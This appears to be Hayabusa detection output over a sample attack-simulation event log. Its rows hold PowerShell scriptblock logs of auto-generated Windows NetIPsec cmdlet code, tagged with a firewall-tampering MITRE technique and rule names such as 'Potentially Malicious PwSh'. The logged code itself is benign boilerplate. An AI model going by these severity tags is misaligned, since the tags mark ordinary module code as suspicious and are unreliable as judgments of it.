'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', 
PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 